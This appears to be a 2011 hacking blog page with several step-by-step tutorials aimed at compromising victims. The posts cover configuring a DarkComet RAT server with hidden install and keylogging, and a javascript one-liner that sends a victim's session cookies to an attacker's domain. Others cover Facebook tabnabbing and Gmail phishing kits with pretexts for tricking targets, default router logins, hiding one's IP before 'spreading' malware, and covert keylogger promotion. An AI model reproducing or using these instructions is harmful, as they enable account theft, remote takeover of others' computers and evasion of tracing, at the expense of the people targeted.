Latest: Hack Facebook Password! | Wants To Hack CellPhone | Trace Mobile Number(only US) ! | New : Best FUD Keylogger!

Featured Posts

hack mobile

Monday, August 29, 2011

Computer Hacking : How To Setup DarkComet - RAT v4.0

Comments Posted by wildrank on Monday, August 29, 2011
We discussed about Cybergate RAT software in my previous article on WildHacker. In this article, I am gonna post the most useful way on how to hack computer and email account password. Hacking software used to hack Computer or Email Account Password is DarkComet-RAT v4.0. RAT, as we all know, is Remote Administration Tool, used to hack computer remotely. DarkComet-RAT v4.0 is very efficient and simple to use to hack Email Account Password, Capture his webcam,Play with victim registry, drives, files etc


Also read RAT(Remote Administration Tool) Guide For Beginners(FAQ)

You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

What is DarkComet ?

DarkComet-RAT (Remote Administration Tool) is software design to control in the best condition and confort possible any kind of Microsoft Windows machine since Windows 2000. This software allow you to make hundreds of functions stealthly and remotely without any kind of autorisation in the remote process. This software is a long time project , started the August 2008 , DarkComet-RAT is now one of the best and one of the most stable RAT ever made and totally free.

Strong Traffic Encryption : DarkComet assure you to protect the best possible your privacy , all the Client/Server comunications are encrypted in RC4-256b using a dynamic encryption key to prevent people to reverse the program and find the generic key, also if you choose a password for connection (recommanded) it will bind the RC4 generic key with your password then it will be totally impossible to guess/find the key.
Server settings are also totally encrpyted with the same cipher to protect at 100% your privacy data.

Full Microsoft Windows Compatibility : DarkComet is design with the latest IDE of Delphi with the last windows graphic API, then the user interface is really clear / profesionnal and easy to use , also it allow you to use DarkComet in any kind of Microsoft Windows platform since Windows 2000 in 32bit and 64bit systems.

Use it even on Mac / Linux : DarkComet is also design specialy for Windows platform emulator like , then you can run it without any problem under Linux and/or Mac and have the same confort than in a real Microsoft machine.Graphics wont be crashed all will be display correctly and no dependency needed.

You don't need to forward your ports : You don't need to forward manually the ports in your router , since version 2.1 i include the UpNP (Universal Plug n Play) system , if your router is compatible (most) with UpNP then don't worry about the ports all will be done automatically and with the best security , when you don't use DarkComet the port will be automaticaly close to prevent attacks.

Works in chinese systems : The client is coded in a full natif Unicode environement then it can easily use and traduce in China, also since version 2.1 it works in all kind of Chinese operating system and display the correct Unicode characters.

Works in NAT via Virtual Machine : DarkComet since the version 2.1 works under Virtual Machine using NAT (Shared connection), then you don't need to force a bridged connection , you can use NAT without any flux transfer problem , its also still very stable and fast even with a shared connection.

Unlimited possibility's : DarkComet is the Remote Administration Tool that have the biggest amount of function , explore hundreds of functions and possibility like (Remote Capture,Webcam Capture,File Explorer, Process Manager,Registry Manager,Remote Shell,Password Grabber,Keylogger, Window Manager,Startup Manager,Remote Scripting,Fun Manager,System Informations,Msn Manager... and a lot more).

Multithread Technologie : DarkComet totally proffit of the wonderfull multithreading , you can do several actions at the same time with one or many users in same time , also the whole socket / threads are coded in pure Win32 API even for Client , that mean no components or VCL Class are use then i have control of the wholes windows events/message then its more fast and stable.

How To Setup DarkComet-RAT v4.0

Follow the instruction given bellow to setup DarkComet - RAT

Step 1: Free Download DarkComet - RAT to hack Computer or email account password.
             Password :   www.wildhacker.com

Step 2: Now, go to No-ip.com and register for an account. Add a host, download No-ip client and connect to your host.

Update: You can refer How to setup No-Ip host for more information on how to setup No-ip host.

Step 3: Run DarkComet RAT on your computer to see,


Step 4: Now hit on Setting ->No-IP Updater


Now, enter your No-IP information ( Host,E-mail and password ) in the boxes and click " Update DSN " button. If you got a message saying that you succesfully updated your Host name then great, if not, make sure that No-IP is working properly and " TRY AGAIN "

It's better if you check the "Auto update your no-ip dsn when your IP change" box, when you finish close the window.

Step 5: Now hit on "Edit Server" -> Main settings to see,


Press the "Generate" button 5-9 times to create a new unique mutex for the process, after that enter an ID for the server so you can identify the slave later and finally enter your profile's name.

Step 6: Now hit on "Network Settings" to see,


Now enter your No-IP on the box called "IP/DNS" and enter the "Port" bellow that,now press on the button labelled "Add this configuration" to add your host's information. As you can see, after you add the host it will appear on the list on the left.

Now press both "Green arrow button" next to IP/DNS and above one to get your Local IP,LAN IP or your WAN IP.

After that you can Test the connection by pressing "Test Network" Button.

Step 7: Now hit on "Module Startup" and check the box on the top which is labelled "Enable module server startup", then choose an installation path and name and finally have fun with the other check boxes bellow...


Step 8: Unfer "Install Message" tap, you can enable it and enter your own error message if you need to, just the infos and choose the icon and thats it...


Step 9: Here under tha "Module Shield" tap, I strongly recommend that you check the "Totally hide stub...." and "Totally hide parent stub.." box, after that you can choose the other settings as you feel necessary...


Step 10: For the "KeyLogger" tap, I guess I don't need to tell you, just check the "Active offline keylogger" box, and if you want to get Logs via FTP activate that too and enter your FTP information.


Step 11: Now the "Choose Icon" tap, leave it on "No Icon" if you don't need it, or click on "Custom Icon" and choose an icon from list bellow, or yet add your very own by putting the path for the *.ico file in the box.


Step 12: Now under the "File Binder" tap, you can bind more than one file to your server..
Start by browsing for the files and when you choose a file click on the "Add File" button to add it to the list until you're done with the files. Also you can let the binded files run only for once with your server or you can check the "Execute binder at each server startup" to do so and finally, select what do you wanna do with the files, either "Drop and execute" or "Inject resource to explorer".


Step 13: Now go to "Build Module" tab to finally create your server. Choose the "Output Extension", then use the "Compression method" or just disable it and finally check the "save profile settings after builed".

Now, proudly press "Build Server" and choose where to save and Congratz.........


After you do that, you're gonna see a lot of movement on the big box on top and you might see a black window apears for few seconds to compress the server and after some time server file will get created.

Thats it..

So friends, I hope this DarkComet RAT Setup tutorial on how to hack Computer or Email account password using DarkComet RAT will be useful for you. If you have any problem in this DarkComet RAT tutorial on how to hack Computer or email account password, please mention it in comments.

Enjoy hAcKiNg…


Sunday, August 28, 2011

How to set up No-ip host - Free Dynamic DNS host

Comments Posted by wildrank on Sunday, August 28, 2011
Hello Guys, previously, I had mentioned about How To Setup Cybergate RAT tutorial. Many of the readers requested me to post a tutorial on how to set up free No-ip DNS host.

So today in this article, I am gonna post on How to set up No-ip host-Free Dynamic DNS host. No-ip host setting is required in various RATs such as Cybergate RAT,DarkComet RAT etc.So, check out the article below to set up free Dynamic DNS host – No-ip.


You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

How to setting up No-ip host

Follow the bellow steps below to setup a No-ip free dynamic host:

Step 1: Register an account at No-ip.com. After email verification, login to your account and click on “Add a host” to get this page:


Step 2:  Now, fill the information as below:
Hostname: Choose anything you want. Mostly use “no-ip.biz” from drop down box, select (Don’t use any other or it may not work).

Step 3:  Leave all things same as it is and hit on “Create host”.

Step 4:  Now, free download No-ip client and install it on your computer. Run the No-ip client software and enter your No-ip login and password. After successful login, No-ip shows pop-up box like this(if it doesn’t show, hit on “Select Hosts”):


Step 5:  Hit on checkbox just besides your host created in step 3 and hit on Save.

That’s it. You have completed setting up free No-ip host.

I hope you will be able to set up No-ip host in simple steps. If you have any problem in this tutorial on how to setup Free dynamic No-ip host, please mention it in comments.

Enjoy HaCkInG......


Tuesday, August 23, 2011

How To Setup Port Forwarding Using Utorrent

Comments Posted by wildrank on Tuesday, August 23, 2011
Hello Guys,in our previous article we have discussed on "How To Setup Port Forwarding Manually", Today i am going write article on How To Setup Port Forwarding Using Utorrent. As I explained in previous article Port forwarding is necessary for using different tools, Such as RATs(DarkComet) and so on.

For connecting to your remote victim, you should have your port forwarded. You can setup port forwarding using default router panel. But, every router has different options making it complicated. Hence, the best way to setup port forwarding is to use Utorrent software. So, In this article I am posting on "how to setup port forwarding using Utorrent".

IF manually portforwarding doesen't work, then you'll need to use Utorrent.


You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

How to setup Port forwarding using Utorrent:

Here in this article I will demonstrate how to forward port number 100.

Step 1: First of all you want to download Utorrent, which can be downloaded here

Step 2: Go to Canyouseeme.org, enter 100 as your port number and hit on Check.


If you have not forwarded port number 100, you will get error message like this:


Step 3: Now, we have to forward port 100. So, run the downloaded Utorrent software on your computer.
To set a single port, navigate to Options > Preferences. Hit on Connection in sidebar to see:


Step 4: Click "random port" once, and note the port number provided. This will be the port number you will be forwarding in your router. (You may also assign a port number of your choice)

Since, we are gonna forward port 100, I have entered 100 in text box.

Step 5: Uncheck "Randomize port each time µTorrent starts." So the port number will no longer change each time µTorrent is started. Hit on OK. Now, exit from Utorrent.

Step 6: Now, make sure you have  RATs(DarkComet) or Cybergate running and again go to Canyouseeme.org. Check for open port 100 as we did in step 2. You will find your port 100 active as shown:


Thus, you are able to setup port forwarding using Utorrent. We have forwarded port 100 in this tutorial.

So friends, this was all about how to setup port forwarding using Utorrent software. Here in this article I have demonstrated how to forward port 100. If you have any problem in this tutorial to setup forwarding using Utorrent, please mention it in comments.

Enjoy n setup port forwarding using Utorrent…


Monday, August 22, 2011

How To Setup Port Forwarding (Router & Modem) Manually

Comments Posted by wildrank on Monday, August 22, 2011
Well, we have discussed a lot on WildHacker about keyloggers, Phishing, Cookies etc.Today in this article, I am gonna post on Port forwarding, which is necessary for using different tools, Such as RATs (DarkComet) and uTorrent and so on.

For connecting to your remote victim, you should have your port forwarded. Thus, you have to setup port forwarding inorder to hack computer remotely using RATs. In this article i am explaining How To Setup Port Forwarding Manually.You can also setup Port forwarding using Utorrent.In next article i will write on it.


You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

How To Setup Port Forwarding Manually

Please follow this guide on How To Port Forward Manually :

Step 1: Start off by going to: Start -> Run -> CMD -> And Type IPCONFIG


Step 2: Now Copy That "Standard Gateway // Default Gateway" IP And Type It Into Your Webbrowser & Log in.


Step 3: My username is Root - nothing. The router // modem accounts usually are theese:

Admin -
Admin - Admin
Admin - Password
Admin - User
Admin - Root
Admin - Custom Password, Check underneath your router for it! ;)

Root - Admin
Root -
Root - Password
Root - Root
Root - Password
Root - Custom Password. Check underneath ;)

User - Root
User -
User - Admin
User - Password
User - User
User - Custom Pass.

And so on................................

Step 4: Once you're logged in, Go to the "port forwarding" or in this case, "Virtual Server"


Step 5: Now Add new Virtual Server or Modify Existing one With following Values,

Virtual Server: Enable / Disable.
Local IP: Found In IPConfig, As IP Adress.
Start Port: The Port You Want To Forward, Start Port.
End Port: The Port You Want To Forward, End Port.
Protocol: TCP & UDP or BOTH
Remark: The Name Of The Wished Forwarded Program.


Step 6: And When You've Saved The Settings, Go To Canyouseeme.org And Type Your Port In There, And If It Says,


Then You've Succeded Your Port Forwarding.

If It Says,


You've Failed. Then I Advice You To Take A Look At Portforward.com And Look For Your Router Or Modem, Once You Find It They Have A Port Forward Tutorial There.

Or Try To Have The Application You Are Forwarding For Open, Like Cybergate Rats & Try Again!

So friends, this was all about how to setup port forwarding (Router & Modem) Manually. You can forward different ports just by entering them in step 5. If you have any problem in this tutorial to setup forwarding Manually, please mention it in comments.Soon, I will also write article on "How to setup Port forwarding using Utorrent"

Enjoy n setup port forwarding.....


Thursday, August 18, 2011

Learn How To Hack Yahoo Password Using Cookies Stealing And Session Hijacking 2011 Part 2

Comments Posted by wildrank on Thursday, August 18, 2011
Well I have posted about Cookies in my previous article "Cookies Stealing And Session Hijacking Introduction". Now today in this article I am going to share information on How To Hack Yahoo Password Using Cookies Stealing And Session Hijacking.

If you are a newbie and don't know about cookie, then for basic information on cookies click here.

Here in this article I am sharing code with step by step procedure with you which will helps you to capture victim cookies, So I hope this tutorial will helps you to hack yahoo password using Session Hijacking and Cookies Stealing.


You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

How To Hack Yahoo Password Using Cookies Stealing And Session Hijacking

Steps for stealing session cookies are as follows,

1. Download the required Cookie Stealer Script from here
    Password : www.wildhacker.com

2. Sign Up for an account at any free web hosting site.I have chosen my3gb.com

    Some other free web hosting sites are :
    110mb.com
    freewebhost.com
    t35.com

3. Now login to your account and go to file manager and upload the four files that you have just downloaded. And also make a new directory named 'cookies'.

4. Now give this code to slave to run in his browser when he would be logged in to his yahoo account.

Code:
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

Quote:
Here is Yahoo.php basically a cookie stealing script and hacked.php executes the stolen cookies in browser.Stolen cookies get stored in directory 'cookies'.When the slave runs the code in his browser, he would again redirect to his yahoo account.

5. Now open the hacked.php.
    Url would be: http://yourdomain.com/hacked.php

   And enter the password (Default password is Wildhacker)

6. Now you must have got the username of slave's account. Simply Click on it and it would take you to inbox of slave's yahoo account without asking for any password.Now it doesn't matter if slave signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign in into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Thus, now you can
hack Yahoo Account Password
using this Cookies Stealing And Session Hijacking Technique. If you have any problem in using this Cookies Stealing And Session Hijacking Script to hack Yahoo Account Password, mention it in comments section.

Enjoy Yahoo Hacking using Cookies Stealing And Session Hijacking....


Monday, August 15, 2011

PetanDrive : Store Upto 1000TB Data virtually On hard drive!

Comments Posted by wildrank on Monday, August 15, 2011
Hello Friends,Happy Independence Day to all my Indian friends.Well, in my previous article we have discussed on "Sniperspy Keylogger",today i am going to share you online Virtual Drive site which provide upto 1000TB space.Its not like all other file hosting sites it offers way way more.


You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

Store Upto 1000TB Data virtually On hard drive!

PetanDrive 1000TB virtual network drive! Access your files from anywhere in the world as a local hard drive or using our browser interface, upload large files, send to friends and much much much more...


  • Huge storage capabilities 1000 TeraBytes (1,000,000 GB) of storage.
  • You can access all of your files using web interface,ftp, or using our program as a local hard drive to access directly from "My Computer".
  • You can send files/folders to friends in just a few seconds using FaceBook or using their PetaNDrive account details.
  • Files are sent instantly, you can send TeraBytes of files in just a few clicks!
  • You can view video files online using the web interface with subtitle support (flash for mobile phone or divx/vlc for your pc) or using our virtual drive program.
  • You can use any download manager like flashget to download files from your account, or use our program to download and open/play the file at the same time!
  • For every file that you upload you will receive a special external link that you will be able to give to your friends to download.
  • You can use our online download manager (Leecher) to download files from other servers rapidly.
  • You can synchronize folders with friends. or use grab to download file/folders links directly to your account.
  • Have many FaceBook friends? Get $0.2 for every friend you bring to our site! For more info click here.
  • And you can receive all of this and more for *free!!!

Note : Free users are limited to download 2 GB/day.

So friends, I hope you like this article.If you have any question please mention it in comments. I will help you.

Enjoy..............


Friday, August 12, 2011

Password Hacking : Sniperspy keylogger For Mac Operating System

Comments Posted by wildrank on Friday, August 12, 2011
In my previously written review on SniperSpy Keylogger which is supported only for windows OS,In that review I concluded that Sniperspy is the best keylogger to hack Facebook Account,Gmail Account or any other Email Account Password.

Now I am writting review on Sniperspy keylogger for Mac Users because many peoples are using Mac Operating System.


You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

SniperSpy Mac Review: What Is It & What Does It Do?

SniperSpy Mac is the only software that enables you to secretly watch your Macintosh like a TV! SniperSpy Mac offers you the ability to monitor activities online in real time. Your logs are safely stored in your secure Internet account which is accessible only by you. You can check logs using any web browser. You can login anytime from any location to view results without needing access to the Mac. The activities recorded are each described below. All logs can be printed for actual physical evidence!


Once you install to your Mac, SniperSpy will begin recording a wide range of Internet and Mac activities. These activities are uploaded to your private control panel. The activities recorded are each described below. All activities include a date/time stamp.

Unlike some other remote monitoring software, SniperSpy’s control panel uses a https connection for secure viewing. It also offers you the power to view graphical representations of data captured and a jpg picture of the screen however often you’d like. The screenshot is shrunk to fit your screen, or you can zoom in at full size to read the text. Store up to 100 of these screenshots inside your account.


Actual Screenshots – Like a surveillance camera pointed at the screen, the entire screen on the remote Mac is captured, showing all active programs, folders, or web pages. Screenshots of the actual desktop are captured, displaying whatever the user is doing on your remote Mac. There will be no hiding their activities from your eyes. Everything they saw you will see.

Keystrokes Typed – Every keystroke that they type while using your Mac will be recorded. Each record will show what was typed and which program or window it was typed. Concerned about what your child posts online? Recording all keystrokes will show you what they are typing while online, from online posts to passwords to website searches and instant messages.

Full Chat Conversations – Every IM chat conversation that occurs on your Mac will be recorded, showing both sides of the conversation and the usernames of those chatting. Concerned who your child or employee may be communicating with? You will now see any and all chat conversations that take place on your Mac, including the usernames of both parties.

Live Time Screen Viewer – Watch all the activity that occurs on your Mac live as it happens. Everything they do you will be able to watch them do live. Wondering what your child or employee is doing on your Mac? Watch what they do live as it happens. Every open window, website, or program will be displayed running in real-time.

Browse File System – Navigate through your remote Mac’s file system at any time to see what they might have saved or hidden on your Mac. Curious as to what might have been saved on your Mac? You can navigate through your Mac’s file system just as if you were in front of it. The user will never see anything.

And many more........

So what are you waiting for, Get your hands on the best Keylogger for Mac OS and Start Monitoring Victim Computer.



For Windows User : Download Sniperspy keylogger here


Wednesday, August 10, 2011

How to Hack Facebook Account Password Using Tabnabbing (New Phishing Method ) Aug 2011

Comments Posted by wildrank on Wednesday, August 10, 2011
Hello Friends, in my previous article we discussed on TABNABBING today i am going to explain you How To Hack Facebook Account Password using Tabnabbing method.

Tabnabbing is a modern type of phishing method used to hack websites passwords. As we all know normal Phishing attack is easily detectable on many site such as Facebook,Gmail, yahoo etc.

Like Facebook has implemented an extra code that validates the previous arriving URL and some basic functions. If it founds that page from which you arrived is a Facebook Phish or fake page, it displays a warning message to user that You have been arrived from fraudulent or fake page. So please change you Facebook account password immediately. So Victim easily came to know that was made fool by someone and he changes his account password again.

For more information about Tabnabbing and how to How to protect yourself from Tabnabbing click here


You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

How to Hack Facebook Account Password Using Tabnabbing

1. Free Download Facebook Phisher package to hack Facebook Password.
    Password: www.wildhacker.com

2. Extract the folder "facebook tabnbbing wildhacker.com"
    It will contain four files :
    a. Facebook.html (Fake Facebook login page)
    b. login.php (Script which captures the login details of the victim
    b. google.html (Standard google page used to trick the user)
    c. tabnabb (Java script which is required for tabnabbing)

3. Now, to any anonymous webhost (any u like), upload this files Facebook.html ,Login.php and Google.html. You can use my3gb.com110mb.com or freewebhost.com or t35.com for this as they are free.

4. Now open tabnabb.js using a notepad , Search for "Enter your URL here" , Now replace it with your "Facebook.html" url which you uploaded in the previous step, finally save it and upload tabnabb.js to your hosting account.

5. After successfull upload, Check whether the hack is working, click on the google.html link and open it , Now open few new tabs , After some time you will see google page switched to your fake Facebook page.

6. To make url (name.webhost.com/index.html) short read this article "How To Hide a Url | Change Url | Mask Url".

7. Now read this Article about Fake Mailer : How To Send Anonymous Email

8. Now, send google.html page to victim inbox of which u want to hack Facebook account password.

9. When, he will login with this facebook phisher to his facebook account, a new file "log.txt" will be created which will contain facebook hacked password in plain text form and he will be redirected to Facebook.com/careers page to avoid suspecion.

Update: If you want to hack facebook and other email account passwords, please use the best Hacking Software- Winspy Keylogger which is FUD (Fully UnDetectable). This is personally recommeded keylogger from wildhacker.

Thus, now you can
hack Facebook account passwords
using this Facebook hacking new technique Tabnabbing. If you have any problem in using this Facebook Phisher to hack Facebook account password, mention it in comments section.

Enjoy Facebook Hacking using Tabnabbing .....


Tabnabbing: Beware of New Type of Phishing Attack

Comments Posted by wildrank on Wednesday, August 10, 2011
Well, we have discussed a lot on WildHacker about Phishing to hack Email accounts. Phishing attack is one of the best methods used for hacking email passwords. Aza Raskin introduced new way of Phishing called Tabnabbing. I have introduced the topic in below article.


You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

Tabnabbing - New Type of Phishing Attack :

Tabnabbing is using the same phishing concepts which we were using previously. But, there are slight changes made to our conventional Phishing method.

Requirements for attack:

- The attacker must have a website.
- The attacker has to embed javascript file(necessary for phishing) in his website.
- Tabnabbing implements multi-tabbing advantage. So, user must browse with multiple tabs.

How Tabnabbing works???

- The user visits the attacker site which looks normal at first.
- The user switches from this attacker site tab and opens another site in new tab, leaving this attacker site tab open. Assume that user opens many tabs.
- While the user browses another site, the attacker site which is left open in previous tab changes or redirects itself to a phishing page say Gmail login.
- Now, when the user returns back to this tab, he may not remember exactly which site he had opened. He will now see fake Gmail login and will think that he has left this Gmail login tab open.
So, now, without checking out url of the site, the user is most probable of logging in to his account.
- Once he enters his login userid and password in our phisher, this information is sent to our inbox or any online account. Thus, his account hacked using this Tabnabbing.


The most useful way to remain protected from such attacks is to reside on addons like Secure Login for logging in to any online account. So, when you return to attacker website(which has been redirected to phisher), the addon Secure Login will check for url and will show the message:

"No login data found for this page"

So, even if the attacker website has changed itself to phisher and the user has forgotten to check it's url, Secure Login will alert user that page is a phisher. Also, it is expected that various browsers will soon release a fix for this hack.

So friends, beware of this new phishing attack - Tabnabbing and protect your online accounts. Remember, Secure Login is the best solution to phishing attacks. If you have any views on this new phishing attack, please share it with us in comments.

Enjoy Hacking...


Sunday, August 7, 2011

How To HIde IP And MAC Address And Becoming Anonymous On Network

Comments Posted by wildrank on Sunday, August 07, 2011
Hello Friends, in my previous article we discussed on How To Hack Gmail Accounts today i am going to explain you How To Becoming Anonymous On Network.

Firstly, this is my first and important tutorial for peoples who are interested in Hacking.I made it to stop people jumping into hacking, when they have left their IP simple to trace and so that people do not have to jump directly into different hacking tutorials such as Keyloggers, Cybergate RAT tutorials.

All the tutorials I have seen on internet tell people How To Set up RAT's, Keyloggers etc. People follow these steps and start spreading, without doing anything to prevent themselves from being traced. You should follow the below steps before you start spreading, otherwise you will be easy to trace. There is no such thing as 100% anonymous, but this will help you.

This tutorial will show you how to become anonymous on the internet.


You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

How To HIde IP And MAC Address And Becoming Anonymous On Network

Before we begin, please download following software,

Mozilla Firefox

WinRar

NOTE:You will need to open most of the files below with WinRar.


First we will spoof our MAC address. MAC stands for "Media Access Control". It is commonly used by the authorities to trace hackers. To make it harder to trace us, we can change it!

Step1 : Firstly, download the Program NMAC here:

Step2 : After you have installed it, open it up, and click proceed.You should see a list at the top of the window.


Click on the first one.

Note: The drop-down box under "Network Connection" changes.

If you are using a wired connection, you need to select the one that says "Local Area Connection". If you are using a wireless connection, you need to select the one that says "Wireless Network Connection". If you are using a VPN, that should be visible too.

Step3 : Once you have found the correct one, click "Random" as many times as you like.


Step4 : Now click on "Update MAC".


Click "Yes" to the window that follows, and wait until you get a window telling you that the adapter was restarted succesfully.

Now You just spoofed your MAC address!


Next, you need a VPN-Virtual Private Network, This will hide your IP address and encrypt your connection.

Step1 : Goto hotspotshield and Click on "Download The Latest Version" on the right-hand side of the page.

Note : If you can afford a paid VPN, it is recommended, but a good free one is Hotspot Shield.

Step2 : Once you have downloaded and installed it, a web page should open up and it should connect to the VPN

Note: You cannot go to some sites when using a VPN. This is because of security.

Congratulations! You now have a VPN!

So friends, I hope you like this tutorial.If you have any problem in this tutorial, mention it in comments section.

Enjoy wIld HAcKiNg.......


Thursday, August 4, 2011

How to Hack Gmail Account Password Using Gmail Phisher 2011

Comments Posted by wildrank on Thursday, August 04, 2011
Hi friends, after my article on Facebook and Hotmail hacking and, now i will inform you How To Hack Gmail Accounts password using Gmail phisher. Most of the Gmail phishier pages available on internet are outdated and also detectable by some antiviruses.So i am sharing this new Gmail Fake page with you.


You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

How to Hack Gmail account password using Gmail Fake Page

1. Free Download Gmail Phisher package to hack Gmail Password.
    Password: www.wildhacker.com

2. Extract the folder "Hack Gmail Account by wildhacker.com"
    It will contain two files :
    a. index(it will call "Gmail Phisher")
    b. next.php
    c. log(Used to store username and password)

3. Now, to any anonymous webhost (any u like), upload this phisher package. You can use my3gb.com110mb.com or freewebhost.com or t35.com for this as they are free.

4. To make url (name.webhost.com/index.html) short read this article "How To Hide a Url | Change Url | Mask Url".

5. Now read this Article about Fake Mailer : How To Send Anonymous Email

6. Now, send Login page to victim inbox of which u want to hack Gmail account password. And ask to login to his Gmail account using this Gmail Phisher. You can make him to do this by telling him that his Gmail account is accessed hacked by third party and if he will login with this Gmail link to hack Gmail account, his ownership will be verified. You can give many other reasons depending on logic.

5. When, he will login with this Gmail phisher to his Gmail account, a new file "log.txt" will be created which will contain Gmail hacked password in plain text form.

Update: If you want to hack Gmail and other email account passwords, please use the best Hacking Software- Winspy Keylogger which is FUD (Fully UnDetectable). This is personally recommeded keylogger from wildhacker.

Thus, now you can
hack Gmail account passwords
using this Gmail hacking software - Gmail Phisher. Gmail Phisher extracts Gmail account password and thus enables you to access and hack Gmail account password. If you have any problem in using this Gmail Phisher to hack Gmail account password, mention it in comments section.

Enjoy Gmail Phishing...


Monday, August 1, 2011

Facebook Hack : How to mass add friends on Facebook + 20k+ mail list

Comments Posted by wildrank on Monday, August 01, 2011
Hello Friends, in my previous article we discussed on How To Turn Your Computer Into A Webserver-Windows today i am going to explain How to mass add friends on Facebook manually.

In this article i have explain a simple and step by step procedure to add many friends at time time.I have also provided list of email 20K+ emails id ( all Mafia War addicts )


You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

How to mass add friends on Facebook

Follow the steps below to add mass friends on Facebook

Step1 : Goto your FaceBook account


Step2 : Go into Account and then Click on edit Friends,


Step3 : Click on Invite Friends,


Step4 : Type the emails id in first text box,add Custome message for friends which you wants to add and click on Invite,


An email list for trial (20000+ emails >> all Mafia War addicts)

Step5 : Finish...

So friends, I hope you like this tutorial.Got problems in using this trick to add mass friends on facebook??? Please mention it in comments. I will help you.

Enjoy..............




 
  • Gmail Hacking

    Wants to hack Gmail a/c password ? Learn best way to hack Gmail password..

  • Jailbreak Iphone/iPad

    Jailbreak your Iphone or iPad to give it more functionality free of cost...

  • Facebook Hacking

    Wants to hack Facebook password? But Don't Know Where to Start? Learn here......

  • MAC Keylogger

    Learn how to hack emails account password on MAC OS using keylogger....

  • Mobile Hacking

    Monitor mobiles,Records the activities of anyone who uses iPhone, BlackBerry....

Disclaimer

ALL INFORMATION / TUTORIALS WRITTEN ON WILDHACKER.COM ARE FOR EDUCATIONAL PURPOSES ONLY, THE SITE WILDHACKER.COM IS NOT RESPONSIBLE IN ANY WAY FOR HOW THIS INFORMATION IS USED, YOU USE IT AT YOUR OWN RISK. YOU MAY LEARN ALSO HOW TO GET YOUR OWN ACCOUNT BACK FROM ALL THIS INFRORMATION.

Recipes

Unlock Iphone Website Hacking

Facebook Hacking Keylogger

Unlock Blackberry Unlock Modem

Gmail Hacking Hack Yahoo

Hotmail Hacking Remote Hacking

Blog Archive

Traffic / Ranking

Powered by:

Wild Hacker © 2012. All Rights Reserved | Contact | Bloggers.com